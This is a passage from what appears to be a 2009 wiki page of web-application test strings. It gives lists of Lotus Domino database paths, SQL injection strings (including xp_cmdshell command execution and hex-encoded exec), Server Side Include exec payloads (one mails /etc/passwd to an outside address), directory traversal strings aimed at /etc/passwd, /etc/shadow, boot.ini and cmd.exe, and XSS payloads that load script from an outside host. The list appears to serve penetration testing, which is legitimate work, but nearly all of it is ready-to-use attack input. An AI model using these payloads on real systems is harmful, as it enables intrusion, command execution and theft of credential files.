/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
